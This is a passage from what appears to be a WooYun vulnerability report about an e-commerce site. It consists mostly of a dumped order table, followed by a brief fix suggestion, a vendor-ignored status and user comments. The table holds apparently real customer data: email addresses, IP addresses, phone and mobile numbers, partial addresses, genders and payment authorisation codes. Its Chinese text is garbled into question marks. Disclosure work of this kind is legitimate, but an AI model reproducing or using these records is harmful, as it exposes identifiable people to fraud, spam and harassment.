| id | uid | TAX_ID | customer_id | TAX | AMT | VAMT | memo | cdate | INV_NO | err_msg | INV_DATE | INV_TYPE | discount | pay_mode | authcode | USERSTAMP | INV_SDATE | INV_TITLE | DATESTAMP | INV_DONATE | ip_address | CREATE_DATE | CREATE_USER | CANCEL_DATE | NON_TAX_AMT | pay_account | description | order_total | CANCEL_USER | receiver_tel | order_status | receive_date | receiver_zip | free_special | receiver_city | receiver_time | extra_product | receiver_name | ok_money_order | receiver_gender | receiver_mobile | receiver_address | free_full_amount | receiver_district |
+------------+------+--------+--------------------------+------+------+------+---------+---------------------+---------+---------------------------------+----------+----------+----------+----------+----------+--------------------------+-----------+-----------+---------------------+------------+---------------+---------------------+--------------------------+-------------+-------------+----------------+---------------------------------------------------------+-------------+-------------+------------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+----------------+-----------------+-----------------+------------------+------------------+-------------------+
| GL1110001B | 240 | NULL | jacky59.chen@gmail.com | 3772 | 3960 | 3960 | <blank> | 2006-12-11 16:10:06 | <blank> | ??????? ????????:5834?????????: | NULL | <blank> | 0 | 1 | NULL | jacky59.chen@gmail.com | NULL | <blank> | 2006-12-11 16:10:06 | 0 | 203.70.36.95 | 2006-12-11 16:10:06 | jacky59.chen@gmail.com | NULL | 188 | 0000 | err_no : 99; err_des : ??????? ????????:5834?????????:; | NULL | NULL | 0226582358 | OR9900 | NULL | 220 | 0 | ??? | a | NULL | ??? | 0 | M | 0935151182 | ???233?14? | 0 | ??? |
| GL1210001B | 4938 | NULL | onceok@onceok.com.tw | 353 | 370 | 370 | <blank> | 2006-12-12 16:06:17 | <blank> | ??????? ????????:9947?????????: | NULL | 2 | 0 | 1 | NULL | onceok@onceok.com.tw | NULL | <blank> | 2006-12-12 16:06:17 | 0 | 61.62.171.240 | 2006-12-12 16:06:17 | onceok@onceok.com.tw | NULL | 17 | 0000 | err_no : 99; err_des : ??????? ????????:9947?????????:; | NULL | NULL | 02-26593579 | OR9900 | NULL | 114 | 0 | ??? | a | NULL | ??? | 0 | M | 0935589789 | ???347?2F | 0 | ??? |
| GL1210002A | 3518 | NULL | lear_wu2001@yahoo.com.tw | 429 | 450 | 450 | <blank> | 2006-12-12 16:23:42 | <blank> | NULL | NULL | 2 | 0 | 1 | 033732 | lear_wu2001@yahoo.com.tw | NULL | <blank> | 2006-12-12 16:23:42 | 0 | 59.124.246.71 | 2006-12-12 16:23:42 | lear_wu2001@yahoo.com.tw | NULL | 21 | 8015 | NULL | NULL | NULL | 02-87982798#8374 | OR2199 | NULL | 114 | 0 | ??? | a | NULL | ??? | 0 | M | 0920130683 | ????????392?16F | 0 | ??? |
| GL12100031 | 4938 | NULL | onceok@onceok.com.tw | 1210 | 1270 | 1270 | <blank> | 2006-12-12 17:31:11 | <blank> | NULL | NULL | 2 | 0 | 1 | NULL | onceok@onceok.com.tw | NULL | <blank> | 2006-12-12 17:31:11 | 0 | 61.62.171.240 | 2006-12-12 17:31:11 | onceok@onceok.com.tw | NULL | 60 | NULL | NULL | NULL | NULL | 02-26593579 | OR9900 | NULL | 114 | 0 | ??? | a | NULL | ??? | 0 | M | 0935589789 | ???347?2F | 0 | ??? |
| GL12100042 | 4938 | NULL | onceok@onceok.com.tw | 1334 | 1400 | 1400 | <blank> | 2006-12-12 17:32:55 | <blank> | NULL | NULL | 2 | 0 | 1 | 055020 | 80117761 | NULL | <blank> | 2006-12-18 16:08:09 | 0 | 61.62.171.240 | 2006-12-12 17:32:55 | onceok@onceok.com.tw | NULL | 66 | 8827 | NULL | NULL | NULL | 02-26593579 | SH9999 | NULL | 114 | 0 | ??? | a | NULL | ??? | 1400 | M | 0935589789 | ???347?2F | 0 | ??? |
| GL12100053 | 3518 | NULL | lear_wu2001@yahoo.com.tw | 429 | 450 | 450 | <blank> | 2006-12-12 17:55:31 | <blank> | NULL | NULL | 2 | 0 | 1 | 062100 | 29420797 | NULL | <blank> | 2006-12-20 12:23:09 | 0 | 59.124.246.71 | 2006-12-12 17:55:31 | lear_wu2001@yahoo.com.tw | NULL | 21 | 8015 | NULL | NULL | NULL | 02-87982798#8374 | SH9999 | NULL | 114 | 0 | ??? | a | NULL | ??? | 450 | M | 0920130683 | ????????392?16F | 0 | ??? |
| GL1310001B | 4938 | NULL | onceok@onceok.com.tw | 420 | 440 | 440 | <blank> | 2006-12-13 15:11:09 | <blank> | NULL | NULL | 2 | 0 | 2 | NULL | 27493127 | NULL | <blank> | 2006-12-22 16:09:50 | 0 | 61.62.171.240 | 2006-12-13 15:11:09 | onceok@onceok.com.tw | NULL | 20 | 81312121300019 | NULL | NULL | NULL | 02-26593579 | SH9999 | NULL | 114 | 0 | ??? | a | NULL | ??? | 440 | M | 0935589789 | ???347?2F | 0 | ??? |
| GL1310002A | NULL | masque76.tw@yahoo.com.tw | 2362 | 2480 | 2480 | <blank> | 2006-12-13 17:16:11 | <blank> | NULL | NULL | <blank> | 0 | 1 | NULL | masque76.tw@yahoo.com.tw | NULL | <blank> | 2006-12-13 17:16:11 | 0 | 61.62.171.240 | 2006-12-13 17:16:11 | masque76.tw@yahoo.com.tw | NULL | 118 | NULL | NULL | NULL | NULL | OR9900 | NULL | 0 | NULL | 0 | ?????????98 | 0 |
+------------+------+--------+--------------------------+------+------+------+---------+---------------------+---------+---------------------------------+----------+----------+----------+----------+----------+--------------------------+-----------+-----------+---------------------+------------+---------------+---------------------+--------------------------+-------------+-------------+----------------+---------------------------------------------------------+-------------+-------------+------------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+----------------+-----------------+-----------------+------------------+------------------+-------------------+


说的差不多了。

修复方案:

对用户的信息要有保障啊。

版权声明:转载请注明来源 暴走@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-26 23:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-02-27 13:43 | 牛 小 帅 ( 普通白帽子 | Rank:1101 漏洞数:257 | 1.乌云最帅的男人 ...)

    这就是百万信息666

  2. 2016-02-27 15:17 | 暴走 ( 普通白帽子 | Rank:518 漏洞数:95 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    @牛 小 帅 实话实说,不过给忽略了!

  3. 2016-02-27 17:06 | 牛 小 帅 ( 普通白帽子 | Rank:1101 漏洞数:257 | 1.乌云最帅的男人 ...)

    @暴走 那些是网站缓存纪录吧,用户不到5万